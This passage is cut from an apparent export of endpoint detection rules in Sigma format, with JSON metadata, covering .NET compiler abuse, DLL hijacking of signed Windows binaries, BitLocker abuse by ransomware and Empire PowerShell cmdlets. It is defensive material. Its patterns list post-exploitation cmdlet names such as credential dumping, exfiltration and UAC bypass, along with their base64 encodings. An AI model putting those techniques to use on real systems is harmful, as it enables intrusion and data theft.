/fullpaths '\n\n exclusion_grandparent:\n GrandparentImage:\n - '?:\\Program Files\\NAKIVO Backup & Replication\\transporter\\bh.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\RuntimeBroker.exe'\n - '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n - '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\\\*\\Bin\\ccSvcHst.exe'\n\n exclusion_commandline:\n CommandLine|contains:\n - '?:\\Windows\\system32\\cmd.exe /c D:\\\\*\\\\*.BAT'\n - '?:\\Windows\\SysWOW64\\cscript.exe D:\\\\*\\\\*.vbs'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noProfile -File D:\\\\*\\\\*.ps1'\n\n exclusion_vscode:\n GrandparentImage|endswith:\n - '\\Microsoft VS Code\\Code.exe'\n - '\\Microsoft.Sara.exe'\n\n # rufus-3.14.exe\n exclusion_rufus:\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\Rufus.ico'\n - '-AppTitle'\n\n exclusion_chocolatey:\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - 'DownloadString'\n - 'chocolatey.org'\n\n exclusion_ad_health_adfs_agent:\n # C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoExit -Command &{write-host Executing Elevated PowerShell Command: Register-AzureADConnectHealthADFSAgent; import-module $env:ProgramW6432\\Azure` Ad` Connect` Health` Adfs` Agent\\PowerShell\\AdHealthAdfs; Register-AzureADConnectHealthADFSAgent}\n ParentCommandLine|contains|all:\n - 'AdHealthAdfs'\n - 'Register-AzureADConnectHealthADFSAgent'\n\n exclusion_node:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage: '?:\\Program Files\\nodejs\\node.exe'\n\n exclusion_unity:\n ParentImage|endswith: '\\cmd.exe'\n GrandparentImage:\n - '?:\\Program Files\\Unity\\Hub\\Editor\\\\*\\Editor\\Unity.exe'\n - '?:\\Program Files\\Unity\\Editor\\Unity.exe'\n\n exclusion_gitlab:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage|endswith: '\\gitlab-runner.exe'\n\n exclusion_amazon_ec2_cmd:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage|endswith: '\\cmd.exe'\n ParentCommandLine|contains|all:\n - '-NonInteractive'\n - '-ExecutionPolicy Unrestricted'\n - 'Import-Module'\n - '?:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\'\n\n exclusion_amazon_ec2_powershell:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage|endswith: '\\powershell.exe'\n GrandparentCommandLine|contains|all:\n - '-NonInteractive'\n - '-ExecutionPolicy Unrestricted'\n - 'Import-Module'\n - '?:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\'\n\n exclusion_amazon_workspace:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - '-NonInteractive'\n - '-ExecutionPolicy AllSigned'\n - '?:\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\'\n\n exclusion_rmm_agent:\n # C:\\WINDOWS\\sysnative\\windowspowershell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File \"C:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_4.ps1\"\n # C:\\WINDOWS\\sysnative\\windowspowershell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File \"C:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_3.ps1\"\n # C:\\WINDOWS\\sysnative\\windowspowershell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File \"C:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_2.ps1\"\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains: '?:\\ProgramData\\NinjaRMMAgent\\scripting'\n\n exclusion_intune:\n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -executionPolicy bypass -file \"C:\\Program Files (x86)\\Microsoft Intune Management Extension\\Policies\\Scripts\\22d3400d-2aa6-48d2-a41c-6c82142e62ff_0563412a-11dc-470c-a210-f9f2ff33ccb9.ps1\"\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Policies\\Scripts\\'\n\n exclusion_bootxray:\n ParentImage|endswith: '\\powershell.exe'\n # powershell.exe -ExecutionPolicy Bypass -Command &{Import-Module (Join-Path $env:ProgramData 'Microsoft Services BootXRay\\BxrR') ; Invoke-BxrR__PostBootActions2 }\n ParentCommandLine|contains|all:\n - 'Import-Module'\n - 'Microsoft Services BootXRay\\BxrR'\n - 'Invoke-BxrR'\n GrandparentImage|endswith: '\\cmd.exe'\n # C:\\WINDOWS\\system32\\cmd.EXE /C C:\\ProgramData\\Microsoft Services BootXRay\\BxrR\\Resource\\Invoke-BxrR__PostBootActions1.bat 120 60\n GrandparentCommandLine|contains: '?:\\ProgramData\\Microsoft Services BootXRay\\BxrR\\Resource\\Invoke-BxrR'\n\n exclusion_dev:\n ParentCommandLine|contains: '?:\\Program Files\\Microsoft Visual Studio\\\\*\\VsDevCmd.bat'\n\n exclusion_installer:\n ProcessCommandLine|contains:\n - 'rundll32.exe ?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI????.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_'\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI????.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_'\n\n condition: selection_process and ((selection_parentimage) or (selection_powershell and not selection_powershell_commandline)) and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86d4bfcf-b95a-4574-ae9a-bb54d1a857ec",
"rule_name": "Suspicious parent process for .NET code compiler",
"rule_description": "Detects an uncommon process launching csc.exe or vbc.exe. These binaries are used to compile .NET code.\nAttackers may compile their payload directly on the compromised host to bypass defense mechanism.\nIt is recommended to check the processes tree for suspicious execution after the compilation.\n",
"rule_creation_date": "2021-06-18",
"rule_modified_date": "2025-11-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86ec5e94-2fe7-4419-883a-d2a53ddfd4b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599354Z",
"creation_date": "2026-03-23T11:45:34.599357Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599365Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_omadmclient.yml",
"content": "title: DLL Hijacking via omadmclient.exe\nid: 86ec5e94-2fe7-4419-883a-d2a53ddfd4b2\ndescription: |\n Detects potential Windows DLL Hijacking via omadmclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'omadmclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\coredplus.dll'\n - '\\cryptsp.dll'\n - '\\DEVOBJ.dll'\n - '\\DMCfgUtils.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\dmenterprisediagnostics.dll'\n - '\\dmiso8601utils.dll'\n - '\\DMOleAutUtils.dll'\n - '\\dmxmlhelputils.dll'\n - '\\IPHLPAPI.DLL'\n - '\\iri.dll'\n - '\\msvcp110_win.dll'\n - '\\omadmapi.dll'\n - '\\policymanager.dll'\n - '\\profapi.dll'\n - '\\umpdc.dll'\n - '\\USERENV.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86ec5e94-2fe7-4419-883a-d2a53ddfd4b2",
"rule_name": "DLL Hijacking via omadmclient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via omadmclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86f9066e-8897-465c-a981-974f87b66ed6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082549Z",
"creation_date": "2026-03-23T11:45:34.082551Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082556Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mtstocom.yml",
"content": "title: DLL Hijacking via mtstocom.exe\nid: 86f9066e-8897-465c-a981-974f87b66ed6\ndescription: |\n Detects potential Windows DLL Hijacking via mtstocom.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mtstocom.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86f9066e-8897-465c-a981-974f87b66ed6",
"rule_name": "DLL Hijacking via mtstocom.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mtstocom.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8725a177-c7fd-4bad-a3e7-915fc609c991",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609567Z",
"creation_date": "2026-03-23T11:45:34.609570Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609578Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
"https://attack.mitre.org/techniques/T1486/"
],
"name": "t1486_suspicious_bitlocker_installation.yml",
"content": "title: BitLocker Installed via PowerShell\nid: 8725a177-c7fd-4bad-a3e7-915fc609c991\ndescription: |\n Detects the suspicious installation of Bitlocker through PowerShell.\n This technique has been abused by DEV-0270 in a September 2022 campaign to encrypt disk drives for impact.\n It is recommended to analyze other commands executed within the PowerShell session using the telemetry to determine whether this actions is legitimate.\nreferences:\n - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\n - https://attack.mitre.org/techniques/T1486/\ndate: 2022/10/06\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1486\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Encryption\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_install:\n PowershellCommand|contains|all:\n - 'Install-WindowsFeature '\n - 'BitLocker'\n\n selection_enabling:\n PowershellCommand|contains|all:\n - 'Enable-BitLocker '\n - 'EncryptionMethod '\n - 'skiphardwaretest '\n - 'password'\n\n exclusion_recoverypassword:\n PowershellCommand|contains: '-RecoveryPasswordProtector'\n\n exclusion_mbam_recovery:\n ProcessCommandLine|contains: '\\bin\\x64\\mbamrecoveryserviceinstaller.ps1'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8725a177-c7fd-4bad-a3e7-915fc609c991",
"rule_name": "BitLocker Installed via PowerShell",
"rule_description": "Detects the suspicious installation of Bitlocker through PowerShell.\nThis technique has been abused by DEV-0270 in a September 2022 campaign to encrypt disk drives for impact.\nIt is recommended to analyze other commands executed within the PowerShell session using the telemetry to determine whether this actions is legitimate.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1486"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8732348d-98d7-4fca-bbec-2a24b491b836",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092545Z",
"creation_date": "2026-03-23T11:45:34.092547Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092551Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/EmpireProject/Empire/tree/master/data/module_source",
"https://github.com/BC-SECURITY/Empire",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_empire_cmd.yml",
"content": "title: Malicious PowerShell Empire Commandlets in Command-line\nid: 8732348d-98d7-4fca-bbec-2a24b491b836\ndescription: |\n Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent.\n This rule detects various malicious commandlets in PowerShell's command-line, generally associated with the Empire framework.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/EmpireProject/Empire/tree/master/data/module_source\n - https://github.com/BC-SECURITY/Empire\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Empire\nlogsource:\n category: process_creation\n product: windows\ndetection:\n powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n malicious_cmdlet:\n CommandLine|contains:\n # Get-FoxDump, from Empire\n - 'Get-FoxDump'\n - 'RwBlAHQALQBGAG8AeABEAHUAbQBwA'\n - 'cAZQB0AC0ARgBvAHgARAB1AG0AcA'\n - 'HAGUAdAAtAEYAbwB4AEQAdQBtAHAA'\n # Get-Screenshot, from Empire\n - 'Get-Screenshot'\n - 'RwBlAHQALQBTAGMAcgBlAGUAbgBzAGgAbwB0A'\n - 'cAZQB0AC0AUwBjAHIAZQBlAG4AcwBoAG8AdA'\n - 'HAGUAdAAtAFMAYwByAGUAZQBuAHMAaABvAHQA'\n # Invoke-NetRipper, from Empire\n - 'Invoke-NetRipper'\n - 'SQBuAHYAbwBrAGUALQBOAGUAdABSAGkAcABwAGUAcg'\n - 'kAbgB2AG8AawBlAC0ATgBlAHQAUgBpAHAAcABlAHIA'\n - 'JAG4AdgBvAGsAZQAtAE4AZQB0AFIAaQBwAHAAZQByA'\n # Invoke-EgressCheck, from Empire\n - 'Invoke-EgressCheck'\n - 'SQBuAHYAbwBrAGUALQBFAGcAcgBlAHMAcwBDAGgAZQBjAGsA'\n - 'kAbgB2AG8AawBlAC0ARQBnAHIAZQBzAHMAQwBoAGUAYwBrA'\n - 'JAG4AdgBvAGsAZQAtAEUAZwByAGUAcwBzAEMAaABlAGMAaw'\n # Invoke-PostExfil, from Empire\n - 'Invoke-PostExfil'\n - 'SQBuAHYAbwBrAGUALQBQAG8AcwB0AEUAeABmAGkAbA'\n - 'kAbgB2AG8AawBlAC0AUABvAHMAdABFAHgAZgBpAGwA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwBzAHQARQB4AGYAaQBsA'\n # Invoke-PSInject, from Empire\n - 'Invoke-PSInject'\n - 'SQBuAHYAbwBrAGUALQBQAFMASQBuAGoAZQBjAHQA'\n - 'kAbgB2AG8AawBlAC0AUABTAEkAbgBqAGUAYwB0A'\n - 'JAG4AdgBvAGsAZQAtAFAAUwBJAG4AagBlAGMAdA'\n # New-HoneyHash, from Empire\n - 'New-HoneyHash'\n - 'TgBlAHcALQBIAG8AbgBlAHkASABhAHMAaA'\n - '4AZQB3AC0ASABvAG4AZQB5AEgAYQBzAGgA'\n - 'OAGUAdwAtAEgAbwBuAGUAeQBIAGEAcwBoA'\n # Invoke-PowerDump, from Empire\n - 'Invoke-PowerDump'\n - 'SQBuAHYAbwBrAGUALQBQAG8AdwBlAHIARAB1AG0AcA'\n - 'kAbgB2AG8AawBlAC0AUABvAHcAZQByAEQAdQBtAHAA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBEAHUAbQBwA'\n # Exploit-Jboss, from Empire\n - 'Exploit-Jboss'\n - 'RQB4AHAAbABvAGkAdAAtAEoAYgBvAHMAcw'\n - 'UAeABwAGwAbwBpAHQALQBKAGIAbwBzAHMA'\n - 'FAHgAcABsAG8AaQB0AC0ASgBiAG8AcwBzA'\n # Invoke-BackdoorLNK, from Empire / HarmJ0y\n - 'Invoke-BackdoorLNK'\n - 'SQBuAHYAbwBrAGUALQBCAGEAYwBrAGQAbwBvAHIATABOAEsA'\n - 'kAbgB2AG8AawBlAC0AQgBhAGMAawBkAG8AbwByAEwATgBLA'\n - 'JAG4AdgBvAGsAZQAtAEIAYQBjAGsAZABvAG8AcgBMAE4ASw'\n # Invoke-BypassUAC, from Empire\n - 'Invoke-BypassUAC'\n - 'SQBuAHYAbwBrAGUALQBCAHkAcABhAHMAcwBVAEEAQw'\n - 'kAbgB2AG8AawBlAC0AQgB5AHAAYQBzAHMAVQBBAEMA'\n - 'JAG4AdgBvAGsAZQAtAEIAeQBwAGEAcwBzAFUAQQBDA'\n # Invoke-Tater, from Empire\n - 'Invoke-Tater'\n - 'SQBuAHYAbwBrAGUALQBUAGEAdABlAHIA'\n - 'kAbgB2AG8AawBlAC0AVABhAHQAZQByA'\n - 'JAG4AdgBvAGsAZQAtAFQAYQB0AGUAcg'\n # Invoke-Paranoia, from Empire\n - 'Invoke-Paranoia'\n - 'SQBuAHYAbwBrAGUALQBQAGEAcgBhAG4AbwBpAGEA'\n - 'kAbgB2AG8AawBlAC0AUABhAHIAYQBuAG8AaQBhA'\n - 'JAG4AdgBvAGsAZQAtAFAAYQByAGEAbgBvAGkAYQ'\n # Invoke-WinEnum, from Empire\n - 'Invoke-WinEnum'\n - 'SQBuAHYAbwBrAGUALQBXAGkAbgBFAG4AdQBtA'\n - 'kAbgB2AG8AawBlAC0AVwBpAG4ARQBuAHUAbQ'\n - 'JAG4AdgBvAGsAZQAtAFcAaQBuAEUAbgB1AG0A'\n # Invoke-ARPScan, from Empire\n - 'Invoke-ARPScan'\n - 'SQBuAHYAbwBrAGUALQBBAFIAUABTAGMAYQBuA'\n - 'kAbgB2AG8AawBlAC0AQQBSAFAAUwBjAGEAbg'\n - 'JAG4AdgBvAGsAZQAtAEEAUgBQAFMAYwBhAG4A'\n\n exclusion_signageos:\n # Get-ScreenshotHelper.ps1 + Get-Screenshot.ps1\n ProcessCommandLine: '*\\signageos\\server\\powershell\\Get-Screenshot*.ps1 -screenshotFilePath *\\signageOS\\fileSystem\\tmp\\screenshots\\\\*.png'\n\n condition: powershell and malicious_cmdlet and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8732348d-98d7-4fca-bbec-2a24b491b836",
"rule_name": "Malicious PowerShell Empire Commandlets in Command-line",
"rule_description": "Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent.\nThis rule detects various malicious commandlets in PowerShell's command-line, generally associated with the Empire framework.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8756b4ce-2c2d-458c-9663-402ab0d945d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099248Z",
"creation_date": "2026-03-23T11:45:34.099250Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099254Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netbtugc.yml",
"content": "title: DLL Hijacking via netbtugc.exe\nid: 8756b4ce-2c2d-458c-9663-402ab0d945d9\ndescription: |\n Detects potential Windows DLL Hijacking via netbtugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netbtugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 